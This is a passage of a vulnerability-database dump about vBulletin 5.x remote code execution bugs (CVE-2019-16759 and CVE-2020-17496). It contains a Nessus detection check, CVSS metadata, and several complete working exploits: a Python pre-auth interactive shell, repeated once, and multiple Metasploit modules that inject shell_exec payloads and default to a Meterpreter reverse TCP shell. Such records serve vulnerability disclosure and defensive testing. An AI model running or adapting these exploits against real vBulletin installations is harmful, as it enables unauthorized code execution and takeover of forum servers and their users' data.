script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vbulletin:vbulletin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vbulletin_detect.nasl\");\n script_require_keys(\"www/vBulletin\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\ninstall = get_kb_item_or_exit('www/'+port+'/vBulletin');\n\nmatches = pregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!matches)\n audit(AUDIT_WEB_APP_NOT_INST, \"vBulletin\", port);\n\ndir = matches[2];\n\nif (dir !~ '/$')\n dir = dir + '/';\n\nurl = dir + 'ajax/render/widget_tabbedcontainer_tab_panel';\n\nres = http_send_recv3(\n method:'POST',\n item:url,\n data:'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo(\\'crc32(\"Nessus\")=\\'.crc32(\\'Nessus\\'));',\n add_headers:make_array('Content-Type', 'application/x-www-form-urlencoded'),\n port:port,\n exit_on_fail:TRUE\n);\n\n# CRC32('Nessus') is 1631274700\nif ('1631274700' >!< res[2])\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'vBulletin', build_url(port:port,qs:dir));\n\nreport =\n 'Nessus was able to verify the issue using the following request :\\n\\n' +\n http_last_sent_request() + '\\n\\n' +\n 'The above request resulted in the following output :\\n\\n' +\n res[2] + '\\n\\n';\n\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T04:09:58", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-12T00:00:00", "type": "exploitdb", "title": "vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2020-08-12T00:00:00", "id": "EDB-ID:48743", "href": "https://www.exploit-db.com/exploits/48743", "sourceData": "# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\r\n# Date: 2020-08-09\r\n# Exploit Author: @zenofex\r\n# Vendor Homepage: https://www.vbulletin.com/\r\n# Software Link: None\r\n# Version: 5.4.5 through 5.6.2\r\n# Tested on: vBulletin 5.6.2 on Ubuntu 19.04\r\n# CVE : None\r\n\r\n# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code\r\n# execution vulnerability caused by incomplete patching of the previous\r\n# \"CVE-2019-16759\" RCE. 
This logic bug allows for a single pre-auth\r\n# request to execute PHP code on a target vBulletin forum.\r\n\r\n#More info can be found at:\r\n#https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/\r\n\r\n\r\n#!/usr/bin/env python3\r\n# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex\r\n\r\nimport argparse\r\nimport requests\r\nimport sys\r\n\r\ndef run_exploit(vb_loc, shell_cmd):\r\n post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : \"echo shell_exec('%s'); exit;\" % shell_cmd}\r\n r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)\r\n return r.text\r\n\r\nap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')\r\nap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')\r\nARGS = ap.parse_args()\r\n\r\nwhile True:\r\n try:\r\n cmd = input(\"vBulletin5$ \")\r\n print(run_exploit(ARGS.location, cmd))\r\n except KeyboardInterrupt:\r\n sys.exit(\"\\nClosing shell...\")\r\n except Exception as e:\r\n sys.exit(str(e))", "sourceHref": "https://www.exploit-db.com/download/48743", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:08:49", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-30T00:00:00", "type": "exploitdb", "title": "vBulletin 5.x - Remote Command Execution (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-16759", "CVE-2019-16759"], "modified": "2019-09-30T00:00:00", "id": "EDB-ID:47437", "href": "https://www.exploit-db.com/exploits/47437", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin 5.x 0day pre-quth RCE exploit',\r\n 'Description' => %q{\r\n vBulletin 5.x 0day pre-auth RCE exploit.\r\n This should work on all versions from 5.0.0 till 5.5.4\r\n },\r\n 'Platform' => 'php',\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Reported by: anonymous', # reported by\r\n 'Original exploit by: anonymous', # original exploit\r\n 'Metasploit mod by: r00tpgp', # metasploit module\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', 'CVE-2019-16759'],\r\n ['EDB', 'NA'],\r\n ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],\r\n ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']\r\n ],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [\r\n [ 'Automatic Targeting', { 'auto' => true } ],\r\n # ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\r\n # ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\r\n ],\r\n 'DisclosureDate' => 'Sep 23 2019',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", 
\"/\"])\r\n ])\r\n\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\r\n 'encode_params' => false,\r\n 'vars_post' => \r\n {\r\n 'widgetConfig[code]' => \"echo shell_exec(\\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\\');exit;\",\r\n }\r\n })\r\n\r\n if res && res.body && res.body.include?('h4x0000r4l1f4')\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status(\"Sending payload.....\")\r\n resp = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\r\n 'encode_params' => false,\r\n 'vars_post' =>\r\n {\r\n #'widgetConfig[code]' => \"echo \" + payload.encoded + \"exit;\",\r\n\t 'widgetConfig[code]' => payload.encoded,\r\n }\r\n })\r\n #unless resp and resp.code == 200\r\n # fail_with(Failure::Unknown, \"Exploit failed.\")\r\n #end\r\n\r\n #print_good(\"Success!\")\r\n #print_line(resp.body)\r\n\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/47437", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2019-12-11T17:03:43", "description": "This Metasploit module exploits vBulletin versions 5.x through 5.5.4 leveraging a remote command execution vulnerability via the widgetConfig[code] parameter in an ajax/render/widget_php routestring POST request.", "cvss3": {}, "published": "2019-12-11T00:00:00", "type": "zdt", "title": "vBulletin 5.5.4 Remote Command Execution Exploit #RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2019-12-11T00:00:00", "id": "1337DAY-ID-33648", "href": "https://0day.today/exploit/description/33648", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin widgetConfig RCE',\r\n 'Description' => %q{\r\n vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code]\r\n parameter in an ajax/render/widget_php routestring POST request.\r\n },\r\n 'Author' => [\r\n 'unknown', # discovered by an unknown sender.\r\n 'mekhalleh (RAMELLA S\u00e9bastien)' # this module.\r\n ],\r\n 'References' => [\r\n ['CVE', '2019-16759'],\r\n ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],\r\n ['URL', 'https://blog.sucuri.net/2019/09/zero-day-rce-in-vbulletin-v5-0-0-v5-5-4.html']\r\n ],\r\n 'DisclosureDate' => '2019-09-23',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php', 'unix', 'windows'],\r\n 'Arch' => [ARCH_CMD, ARCH_PHP],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n ['Meterpreter (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => [ARCH_PHP],\r\n 'Type' => :php_memory,\r\n 'Payload' => {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\r\n 'DisablePayloadHandler' => 'false'\r\n }\r\n ],\r\n ['Unix (CMD In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_cmd,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/generic',\r\n 'DisablePayloadHandler' => 'true'\r\n }\r\n ],\r\n ['Windows (CMD In-Memory)',\r\n 'Platform' => 'windows',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :windows_cmd,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/windows/generic',\r\n 'DisablePayloadHandler' => 'true'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n 'SideEffects' => [IOC_IN_LOGS]\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 
'The URI of the vBulletin base path', '/']),\r\n OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false])\r\n ])\r\n end\r\n\r\n def cmd_payload(command)\r\n return(\"echo #{datastore['PHP_CMD']}('#{command}'); exit;\")\r\n end\r\n\r\n def execute_command(command)\r\n response = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'encode_params' => true,\r\n 'vars_post' => {\r\n 'routestring' => 'ajax/render/widget_php',\r\n 'widgetConfig[code]' => command\r\n }\r\n })\r\n if (response) && (response.body)\r\n return response\r\n end\r\n\r\n return false\r\n end\r\n\r\n def check\r\n rand_str = Rex::Text.rand_text_alpha(8)\r\n received = execute_command(cmd_payload(\"echo #{rand_str}\"))\r\n if received && received.body.include?(rand_str)\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n unless check.eql? 
Exploit::CheckCode::Vulnerable\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\r\n end\r\n end\r\n vprint_good(\"The target appears to be vulnerable.\")\r\n\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n case target['Type']\r\n when :unix_cmd, :windows_cmd\r\n cmd = cmd_payload(payload.encoded)\r\n vprint_status(\"Generated command payload: #{cmd}\")\r\n\r\n received = execute_command(cmd)\r\n if (received) && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\")\r\n print_warning('Dumping command output in body response')\r\n if received.body.empty?\r\n print_error('Empty response, no command output')\r\n return\r\n end\r\n print_line(\"#{received.body}\")\r\n end\r\n\r\n when :php_memory\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n execute_command(payload.encoded)\r\n end\r\n end\r\nend\n\n# 0day.today [2019-12-11] #", "sourceHref": "https://0day.today/exploit/33648", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-14T22:01:00", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2020-08-12T00:00:00", "type": "zdt", "title": "vBulletin 5.6.2 - (widget_tabbedContainer_tab_panel) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2020-08-12T00:00:00", "id": "1337DAY-ID-34823", "href": "https://0day.today/exploit/description/34823", "sourceData": "# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\r\n# Exploit Author: @zenofex\r\n# Vendor Homepage: https://www.vbulletin.com/\r\n# Software Link: None\r\n# Version: 5.4.5 through 5.6.2\r\n# Tested on: vBulletin 5.6.2 on Ubuntu 19.04\r\n# CVE : None\r\n\r\n# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code\r\n# execution vulnerability caused by incomplete patching of the previous\r\n# 
\"CVE-2019-16759\" RCE. This logic bug allows for a single pre-auth\r\n# request to execute PHP code on a target vBulletin forum.\r\n\r\n#More info can be found at:\r\n#https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/\r\n\r\n\r\n#!/usr/bin/env python3\r\n# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex\r\n\r\nimport argparse\r\nimport requests\r\nimport sys\r\n\r\ndef run_exploit(vb_loc, shell_cmd):\r\n post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : \"echo shell_exec('%s'); exit;\" % shell_cmd}\r\n r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)\r\n return r.text\r\n\r\nap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')\r\nap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')\r\nARGS = ap.parse_args()\r\n\r\nwhile True:\r\n try:\r\n cmd = input(\"vBulletin5$ \")\r\n print(run_exploit(ARGS.location, cmd))\r\n except KeyboardInterrupt:\r\n sys.exit(\"\\nClosing shell...\")\r\n except Exception as e:\r\n sys.exit(str(e))\n\n# 0day.today [2020-08-14] #", "sourceHref": "https://0day.today/exploit/34823", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-04T07:54:27", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2019-10-01T00:00:00", "type": "zdt", "title": "vBulletin 5.x - Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2019-10-01T00:00:00", "id": "1337DAY-ID-33300", "href": "https://0day.today/exploit/description/33300", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include 
Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin 5.x 0day pre-quth RCE exploit',\r\n 'Description' => %q{\r\n vBulletin 5.x 0day pre-auth RCE exploit.\r\n This should work on all versions from 5.0.0 till 5.5.4\r\n },\r\n 'Platform' => 'php',\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Reported by: anonymous', # reported by\r\n 'Original exploit by: anonymous', # original exploit\r\n 'Metasploit mod by: r00tpgp', # metasploit module\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', 'CVE-2019-16759'],\r\n ['EDB', 'NA'],\r\n ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],\r\n ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']\r\n ],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [\r\n [ 'Automatic Targeting', { 'auto' => true } ],\r\n # ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\r\n # ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\r\n ],\r\n 'DisclosureDate' => 'Sep 23 2019',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\r\n ])\r\n\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\r\n 'encode_params' => false,\r\n 'vars_post' => \r\n {\r\n 'widgetConfig[code]' => \"echo shell_exec(\\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\\');exit;\",\r\n }\r\n })\r\n\r\n if res && res.body && res.body.include?('h4x0000r4l1f4')\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status(\"Sending payload.....\")\r\n resp = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\r\n 'encode_params' => false,\r\n 
'vars_post' =>\r\n {\r\n #'widgetConfig[code]' => \"echo \" + payload.encoded + \"exit;\",\r\n\t 'widgetConfig[code]' => payload.encoded,\r\n }\r\n })\r\n #unless resp and resp.code == 200\r\n # fail_with(Failure::Unknown, \"Exploit failed.\")\r\n #end\r\n\r\n #print_good(\"Success!\")\r\n #print_line(resp.body)\r\n\r\n end\r\nend\n\n# 0day.today [2019-12-04] #", "sourceHref": "https://0day.today/exploit/33300", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-23T23:23:56", "description": "This Metasploit module exploits a logic bug within the template rendering code in vBulletin 5.x. The module uses the vBulletin template rendering functionality to render the widget_tabbedcontainer_tab_panel template while also providing the widget_php argument. This causes the former template to load the latter bypassing filters originally put in place to address CVE-2019-16759. This also allows the exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution on the target. 
This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-12T00:00:00", "type": "zdt", "title": "vBulletin 5.x Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7373", "CVE-2019-16759"], "modified": "2020-08-12T00:00:00", "id": "1337DAY-ID-34826", "href": "https://0day.today/exploit/description/34826", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n\n HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.',\n 'Description' => %q{\n This module exploits a logic bug within the template rendering code in vBulletin 5.x.\n The 
module uses the vBulletin template rendering functionality to render the\n 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument.\n This causes the former template to load the latter bypassing filters originally put in place\n to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input\n allowing the module to achieve PHP remote code execution on the target. This module has been\n tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.\n },\n 'Author' => [\n 'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module\n ],\n 'References' => [\n ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/'],\n ['CVE', '2020-7373']\n ],\n 'DisclosureDate' => '2020-08-09',\n 'License' => MSF_LICENSE,\n 'Platform' => ['php', 'unix', 'windows'],\n 'Arch' => [ARCH_CMD, ARCH_PHP],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Meterpreter (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => [ARCH_PHP],\n 'Type' => :php_memory,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => false\n }\n ],\n [\n 'Unix (CMD In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => true\n }\n ],\n [\n 'Windows (CMD In-Memory)',\n 'Platform' => 'windows',\n 'Arch' => ARCH_CMD,\n 'Type' => :windows_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/generic',\n 'DisablePayloadHandler' => true\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']),\n OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']])\n ])\n\n 
end\n\n def cmd_payload(command)\n \"echo #{datastore['PHP_CMD']}(base64_decode('#{Rex::Text.encode_base64(command)}')); exit;\"\n end\n\n def execute_command(command)\n response = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ajax/render/widget_tabbedcontainer_tab_panel'),\n 'encode_params' => true,\n 'vars_post' => {\n 'subWidgets[0][template]' => 'widget_php',\n 'subWidgets[0][config][code]' => command\n }\n })\n if response && response.body\n return response\n end\n\n false\n end\n\n def check\n rand_str = Rex::Text.rand_text_alpha(8)\n received = execute_command(cmd_payload(\"echo #{rand_str}\"))\n if received && received.body.include?(rand_str)\n return Exploit::CheckCode::Vulnerable\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n case target['Type']\n when :unix_cmd, :windows_cmd\n cmd = cmd_payload(payload.encoded)\n vprint_status(\"Generated command payload: #{cmd}\")\n\n received = execute_command(cmd)\n if received && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\")\n print_warning('Dumping command output in body response')\n if received.body.empty?\n print_error('Empty response, no command output')\n return\n end\n print_line(received.body.to_s)\n end\n\n when :php_memory\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n execute_command(payload.encoded)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/34826", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T21:16:15", "description": "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-24T22:15:00", "type": "cve", "title": "CVE-2019-16759", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/a:vbulletin:vbulletin:5.5.4"], "id": "CVE-2019-16759", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16759", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vbulletin:vbulletin:5.5.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-10-26T14:27:55", "description": "vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. 
NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-12T14:15:00", "type": "cve", "title": "CVE-2020-17496", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": 